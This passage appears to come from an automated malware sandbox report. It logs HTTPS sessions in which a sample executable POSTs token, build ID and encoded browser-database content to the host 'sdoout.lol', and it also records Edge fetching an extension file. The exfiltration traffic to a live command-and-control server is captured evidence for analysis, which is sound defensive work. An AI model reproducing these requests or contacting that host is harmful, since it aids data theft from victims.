                                                                                                                                                                                                                                                                                          2024-12-30 14:55:27 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                          2024-12-30 14:55:27 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                          2024-12-30 14:55:27 UTC16355OUTData Raw: 76 62 6e 52 68 59 33 52 66 61 57 35 6d 62 79 41 6f 5a 33 56 70 5a 43 42 57 51 56 4a 44 53 45 46 53 49 46 42 53 53 55 31 42 55 6c 6b 67 53 30 56 5a 4c 43 42 31 63 32 56 66 59 32 39 31 62 6e 51 67 53 55 35 55 52 55 64 46 55 69 42 4f 54 31 51 67 54 6c 56 4d 54 43 42 45 52 55 5a 42 56 55 78 55 49 44 41 73 49 48 56 7a 5a 56 39 6b 59 58 52 6c 49 45 6c 4f 56 45 56 48 52 56 49 67 54 6b 39 55 49 45 35 56 54 45 77 67 52 45 56 47 51 56 56 4d 56 43 41 77 4c 43 42 6b 59 58 52 6c 58 32 31 76 5a 47 6c 6d 61 57 56 6b 49 45 6c 4f 56 45 56 48 52 56 49 67 54 6b 39 55 49 45 35 56 54 45 77 67 52 45 56 47 51 56 56 4d 56 43 41 77 4c 43 42 73 59 57 35 6e 64 57 46 6e 5a 56 39 6a 62 32 52 6c 49 46 5a 42 55 6b 4e 49 51 56 49 73 49 47 78 68 59 6d 56 73 49 46 5a 42 55 6b 4e 49 51 56
                                                                                                                                                                                                                                                                                          Data Ascii: vbnRhY3RfaW5mbyAoZ3VpZCBWQVJDSEFSIFBSSU1BUlkgS0VZLCB1c2VfY291bnQgSU5URUdFUiBOT1QgTlVMTCBERUZBVUxUIDAsIHVzZV9kYXRlIElOVEVHRVIgTk9UIE5VTEwgREVGQVVMVCAwLCBkYXRlX21vZGlmaWVkIElOVEVHRVIgTk9UIE5VTEwgREVGQVVMVCAwLCBsYW5ndWFnZV9jb2RlIFZBUkNIQVIsIGxhYmVsIFZBUkNIQV
                                                                                                                                                                                                                                                                                          2024-12-30 14:55:27 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                          2024-12-30 14:55:27 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                          2024-12-30 14:55:27 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                          2024-12-30 14:55:27 UTC11617OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                          2024-12-30 14:55:28 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                          Date: Mon, 30 Dec 2024 14:55:28 GMT
                                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                          2024-12-30 14:55:28 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                          Data Ascii: 2ok0


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          18192.168.2.953848116.203.14.44437428C:\Users\user\Desktop\BHgwhz3lGN.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          2024-12-30 14:55:28 UTC275OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----phdj5fc2ngvaaaimy5xl
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                                                                                                                          Host: sdoout.lol
                                                                                                                                                                                                                                                                                          Content-Length: 493
                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                          2024-12-30 14:55:28 UTC493OUTData Raw: 2d 2d 2d 2d 2d 2d 70 68 64 6a 35 66 63 32 6e 67 76 61 61 61 69 6d 79 35 78 6c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 66 34 39 31 31 31 32 61 62 62 66 33 35 64 37 64 35 34 64 62 66 32 62 38 39 65 62 31 31 30 38 0d 0a 2d 2d 2d 2d 2d 2d 70 68 64 6a 35 66 63 32 6e 67 76 61 61 61 69 6d 79 35 78 6c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 64 30 37 31 33 65 32 36 63 35 30 34 64 35 39 30 37 36 37 39 32 32 31 62 38 63 35 39 65 36 63 0d 0a 2d 2d 2d 2d 2d 2d 70 68 64 6a 35 66 63 32 6e 67 76 61 61 61 69 6d 79 35 78 6c 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                          Data Ascii: ------phdj5fc2ngvaaaimy5xlContent-Disposition: form-data; name="token"9f491112abbf35d7d54dbf2b89eb1108------phdj5fc2ngvaaaimy5xlContent-Disposition: form-data; name="build_id"cd0713e26c504d5907679221b8c59e6c------phdj5fc2ngvaaaimy5xlCont
                                                                                                                                                                                                                                                                                          2024-12-30 14:55:29 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                          Date: Mon, 30 Dec 2024 14:55:29 GMT
                                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                          2024-12-30 14:55:29 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                          Data Ascii: 2ok0


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          19192.168.2.953876116.203.14.44437428C:\Users\user\Desktop\BHgwhz3lGN.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          2024-12-30 14:55:34 UTC276OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----kfcjwbiekngvaaieukng
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                                                                                                                          Host: sdoout.lol
                                                                                                                                                                                                                                                                                          Content-Length: 3165
                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                          2024-12-30 14:55:34 UTC3165OUTData Raw: 2d 2d 2d 2d 2d 2d 6b 66 63 6a 77 62 69 65 6b 6e 67 76 61 61 69 65 75 6b 6e 67 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 66 34 39 31 31 31 32 61 62 62 66 33 35 64 37 64 35 34 64 62 66 32 62 38 39 65 62 31 31 30 38 0d 0a 2d 2d 2d 2d 2d 2d 6b 66 63 6a 77 62 69 65 6b 6e 67 76 61 61 69 65 75 6b 6e 67 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 64 30 37 31 33 65 32 36 63 35 30 34 64 35 39 30 37 36 37 39 32 32 31 62 38 63 35 39 65 36 63 0d 0a 2d 2d 2d 2d 2d 2d 6b 66 63 6a 77 62 69 65 6b 6e 67 76 61 61 69 65 75 6b 6e 67 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                          Data Ascii: ------kfcjwbiekngvaaieukngContent-Disposition: form-data; name="token"9f491112abbf35d7d54dbf2b89eb1108------kfcjwbiekngvaaieukngContent-Disposition: form-data; name="build_id"cd0713e26c504d5907679221b8c59e6c------kfcjwbiekngvaaieukngCont
                                                                                                                                                                                                                                                                                          2024-12-30 14:55:35 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                          Date: Mon, 30 Dec 2024 14:55:35 GMT
                                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                          2024-12-30 14:55:35 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                          Data Ascii: 2ok0


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          20192.168.2.953879172.217.16.1934434108C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          2024-12-30 14:55:35 UTC594OUTGET /crx/blobs/AW50ZFvmkG4OHGgRTAu7ED1s4Osp5h4hBv39bA-6HcwOhSY7CGpTiD4wJ46Ud6Bo6P7yWyrRWCx-L37vtqrnUs3U44hGlerneoOywl1xhFHZUyPx_GIMNYxNDzQk9TJs4K4AxlKa5fjk7yW6cw-fwnpof9qnkobSLXrM/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_85_1_0.crx HTTP/1.1
                                                                                                                                                                                                                                                                                          Host: clients2.googleusercontent.com
                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                          Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                                          2024-12-30 14:55:36 UTC570INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          X-GUploader-UploadID: AFiumC4M2LGFnwK9s_tMwW2O9K8-kiUpCEU0Z5NcX7lmE-7TgspNH7xDGxL5GWCna1eMG-i7_nvwytY
                                                                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                          Content-Length: 154477
                                                                                                                                                                                                                                                                                          X-Goog-Hash: crc32c=F5qq4g==
                                                                                                                                                                                                                                                                                          Server: UploadServer
                                                                                                                                                                                                                                                                                          Date: Sun, 29 Dec 2024 15:58:13 GMT
                                                                                                                                                                                                                                                                                          Expires: Mon, 29 Dec 2025 15:58:13 GMT
                                                                                                                                                                                                                                                                                          Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                                                                          Age: 82642
                                                                                                                                                                                                                                                                                          Last-Modified: Thu, 12 Dec 2024 15:58:04 GMT
                                                                                                                                                                                                                                                                                          ETag: a01bfa19_322860b8_b556d942_61bcf747_a602b083
                                                                                                                                                                                                                                                                                          Content-Type: application/x-chrome-extension
                                                                                                                                                                                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                          2024-12-30 14:55:36 UTC820INData Raw: 43 72 32 34 03 00 00 00 f3 15 00 00 12 ac 04 0a a6 02 30 82 01 22 30 0d 06 09 2a 86 48 86 f7 0d 01 01 01 05 00 03 82 01 0f 00 30 82 01 0a 02 82 01 01 00 9c 5e d1 18 b0 31 22 89 f4 fd 77 8d 67 83 0b 74 fd c3 32 4a 0e 47 31 00 29 58 34 b1 bf 3d 26 90 3f 5b 6a 2c 4c 7a fd d5 6a b0 75 cf 65 5b 49 85 71 2a 42 61 2f 58 dd ee dc 50 c1 68 fc cd 84 4c 04 88 b9 99 dc 32 25 33 5f 6f f4 ae b5 ad 19 0d d4 b8 48 f7 29 27 b9 3d d6 95 65 f8 ac c8 9c 3f 15 e6 ef 1f 08 ab 11 6a e1 a9 c8 33 55 48 fd 7c bf 58 8c 4d 06 e3 97 75 cc c2 9c 73 5b a6 2a f2 ea 3f 24 f3 9c db 8a 05 9f 46 25 11 1d 18 b4 49 08 19 94 80 29 08 f2 2c 2d c0 2f 90 65 35 29 a6 66 83 e7 4f e4 b2 71 14 5e ff 90 92 01 8d d3 bf ca a0 d0 39 a0 08 28 e3 d2 5f d5 70 68 32 fe 10 5e d5 59 42 50 58 66 5f 38 cc 0b 08
                                                                                                                                                                                                                                                                                          Data Ascii: Cr240"0*H0^1"wgt2JG1)X4=&?[j,Lzjue[Iq*Ba/XPhL2%3_oH)'=e?j3UH|XMus[*?$F%I),-/e5)fOq^9(_ph2^YBPXf_8
                                                                                                                                                                                                                                                                                          2024-12-30 14:55:36 UTC1390INData Raw: d5 b5 fc 3c 0f e3 f9 d2 ff f8 fb 8f f1 b3 aa ea fc 5a ff 65 a8 3e ff f2 76 56 d5 8f bf fe b8 9e df fb 4a fe 2c 2f fd 58 f5 e3 8f bf ff eb c7 90 3f d4 25 97 fa fc ea 11 36 05 b0 0d c1 6d 23 05 75 5d 82 5a 95 8f c3 96 5b d7 73 d6 4d 5f 19 18 df 4a a0 b6 22 39 6c 91 fb 6c a3 f3 fd 2c 7c d5 8b 14 19 87 e6 72 d6 e7 d7 51 43 c1 e1 fb ef 9d ba 8a 34 3a 9f d4 f8 cb a1 77 6a e9 bf 9f 4f e7 c3 14 35 ef b7 d2 b7 fb ef 73 ca 6e f7 25 e1 ee 92 a5 e8 f2 fd 79 01 10 17 0f 63 e2 fc fd 91 b4 23 46 0c 8e b4 1b 1b e1 a3 2e ef a8 29 67 76 28 cd 10 21 53 ec 49 17 3e f2 20 dc 54 be b0 c5 23 dc 1d 83 eb b9 f4 a1 91 ef 0f db 83 da 5d 0b 80 ea c2 67 f3 11 c0 ee 08 4c 55 5a a8 16 40 1f 77 c3 5c 80 cd f9 b8 0f 1f 05 d8 fd 7b 9d df f7 16 4e b9 a7 7a 66 d5 6e 02 19 3a 72 f1 95 74 0c
                                                                                                                                                                                                                                                                                          Data Ascii: <Ze>vVJ,/X?%6m#u]Z[sM_J"9ll,|rQC4:wjO5sn%yc#F.)gv(!SI> T#]gLUZ@w\{Nzfn:rt
                                                                                                                                                                                                                                                                                          2024-12-30 14:55:36 UTC1390INData Raw: b0 78 c3 9a 50 64 5d fb 40 b0 b4 75 cd a2 45 ec b5 f7 5f 79 7d 9c cd 6c 12 a9 d6 7b 85 01 32 0c 8b 32 98 4b 0f f9 85 0b e3 3c 40 38 52 9e 25 bb 7a 8f 3d a8 39 20 c4 e5 c3 0c b0 21 bf 16 af df 1f d6 7a ee 0d 99 c3 31 ea 95 12 c6 e4 1c 29 ba 47 74 ec a8 92 fb c2 95 5e e2 ca b0 a4 22 c6 26 76 ca 5e 73 34 d5 7c c4 e8 14 05 cb 7b 5f fe 1f 38 b8 6c f0 90 19 b5 92 81 f8 cc 81 4a 13 2f 1a 49 e0 78 71 23 7a 01 c2 0c 77 ba 14 2c e7 2c 3c 91 d1 4e bc 96 0a 3a 18 c8 cd 72 ef c9 b5 f8 8f da e7 6e b0 2f 3c 34 d7 ad f4 42 40 4c d8 a1 40 88 dc 18 8e 64 d6 1c e0 63 1e 05 cf 20 06 f7 3b 0b 70 9c 51 ec 56 dd fb 7d 11 7f 6b 6d ef 0d 1e 52 b0 4d ad e1 45 2a 6f 3e c1 ba 25 26 a2 d8 aa 43 9d 31 12 d1 9a b3 ce 3a 54 eb 81 1f 1b e6 0b 22 ca 2f 2d 08 8a 65 ef 77 c9 57 62 8f 5b 75
                                                                                                                                                                                                                                                                                          Data Ascii: xPd]@uE_y}l{22K<@8R%z=9 !z1)Gt^"&v^s4|{_8lJ/Ixq#zw,,<N:rn/<4B@L@dc ;pQV}kmRME*o>%&C1:T"/-ewWb[u
                                                                                                                                                                                                                                                                                          2024-12-30 14:55:36 UTC1390INData Raw: d6 e1 6d c0 c8 18 51 ae 14 17 a9 0a ca 56 6b be f7 64 1f 49 78 97 5a b7 31 fc 9e 6d a1 03 6f d9 e7 f7 53 08 01 c3 c5 b9 7a b9 76 b6 db 53 9b 34 0a 6b 4e 57 59 c3 5e 19 bf 00 5d 8b aa e8 60 1e 51 13 25 a6 e3 15 9d 7d ca 7d 96 c5 a9 08 a9 a5 b6 19 1f 60 d5 2f 62 7f 2f 56 f2 3d 57 f8 23 62 ea 11 f9 e1 a4 f7 19 e1 40 b8 32 a8 3b d1 0e 75 e4 ef 5e a5 8b 7d 02 3c b3 b0 c2 54 f7 e1 89 cc ec 28 67 76 59 d4 5a cb 31 52 23 4c d6 ce d6 b5 6f 6c b9 2b 3b 9d 71 b7 59 27 29 f2 cd 97 cc b0 23 c2 6d 96 10 c7 cf 94 88 f2 6e 6a 64 2b 51 dc e1 73 d9 1f ee 59 f3 bf e0 1f e0 37 0a e3 95 33 5e 91 a6 46 6d ea cf 64 89 31 b8 c4 90 37 6a 0a ad fa f8 c0 5c 14 73 a2 84 ce 1a f7 08 d6 da 7b b1 29 06 b5 cf 3b d4 47 7c d1 e7 3f 8a b5 cf 36 82 c8 ca 3a 7b 7f 72 db 3b 69 f1 47 d9 87 17
                                                                                                                                                                                                                                                                                          Data Ascii: mQVkdIxZ1moSzvS4kNWY^]`Q%}}`/b/V=W#b@2;u^}<T(gvYZ1R#Lol+;qY')#mnjd+QsY73^Fmd17j\s{);G|?6:{r;iG
                                                                                                                                                                                                                                                                                          2024-12-30 14:55:36 UTC1390INData Raw: d9 c3 10 d6 1f b2 cd fd bb 9e 52 c0 c6 ac 63 6d 6a 7d 63 a0 ee bf 61 fe 67 d7 ed a2 91 18 ea 83 e8 bc 84 3c f6 92 99 0e 39 52 fb 50 a4 8e 8d b9 50 b4 45 0e 0e e8 5c f4 48 13 5f 36 61 f7 d9 4a 58 d8 a4 e0 0f 1c 33 8b 34 04 b9 4e a3 a9 25 bf ca 6e d4 75 b6 3b e7 dc 7e 2b 83 f0 4b fc 4f d7 6f 8d 99 43 f4 2a 3b 16 67 fd f0 c0 81 0c 22 df 3e 68 cf fc 25 d5 a0 cd 23 dc 62 3a 6c 78 5f c7 cc 17 bd ce 53 9b 88 64 9b f2 5b 5f 98 71 3d 74 42 5f cb ac e5 6f 5a 85 bf 31 ff bd 96 74 6d fd 76 0d b8 3b 7f f7 5c 6e 6a 9f 9b 0e 4a ef 8f 11 b9 2d f8 fd b3 ca 10 dc fc ce f2 bf cd d3 72 cd a9 3a 3f 7e e8 ba 50 b9 e5 8c 85 66 3c 7d 7c cb b9 ae b1 2e d4 de 6e 77 cd fd f1 92 27 87 ff fc ac be ef 47 09 d4 77 ef e8 3d f4 6e 27 97 de a2 ef ff f7 ce 43 af 53 f3 cd ee 9a 5a 42 95 3d
                                                                                                                                                                                                                                                                                          Data Ascii: Rcmj}cag<9RPPE\H_6aJX34N%nu;~+KOoC*;g">h%#b:lx_Sd[_q=tB_oZ1tmv;\njJ-r:?~Pf<}|.nw'Gw=n'CSZB=
